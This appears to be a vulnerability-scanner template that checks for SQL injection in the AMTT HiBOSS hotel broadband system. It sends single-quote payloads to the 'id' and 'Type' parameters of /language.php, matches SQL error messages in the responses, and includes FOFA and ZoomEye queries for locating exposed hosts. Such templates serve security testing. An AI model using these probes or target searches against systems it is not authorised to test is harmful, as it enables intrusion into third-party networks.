id: amtt-hiboss-language-sqli

info:
  name: 安美数字酒店宽带运营系统SQL注入漏洞
  author: SleepingBag945
  severity: high
  description: |-
    FOFA: title=酒店宽带运营系统
    ZoomEye: app:"安美数字酒店宽带运营系统"
  reference:
    - https://github.com/zan8in/afrog/blob/main/v2/pocs/afrog-pocs/vulnerability/amtt-hiboss-language-sqli.yaml
  tags: amtt,hiboss,sqli

http:
  - raw:
      - |
        GET /language.php?Lately=&EditStatus=&Type=&Flag=edit&id='&Search= HTTP/1.1
        Host: {{Hostname}}
      
      - |
        GET /language.php?Lately=&EditStatus=&Type='&Flag=edit&id=&Search= HTTP/1.1
        Host: {{Hostname}}

    stop-at-first-match: true
    req-condition: true
    matchers:
      - type: dsl
        dsl:
          - status_code_1==200 && contains(body_1,"SQL syntax")
          - status_code_2==200 && contains(body_2,"SQL syntax")
        condition: or
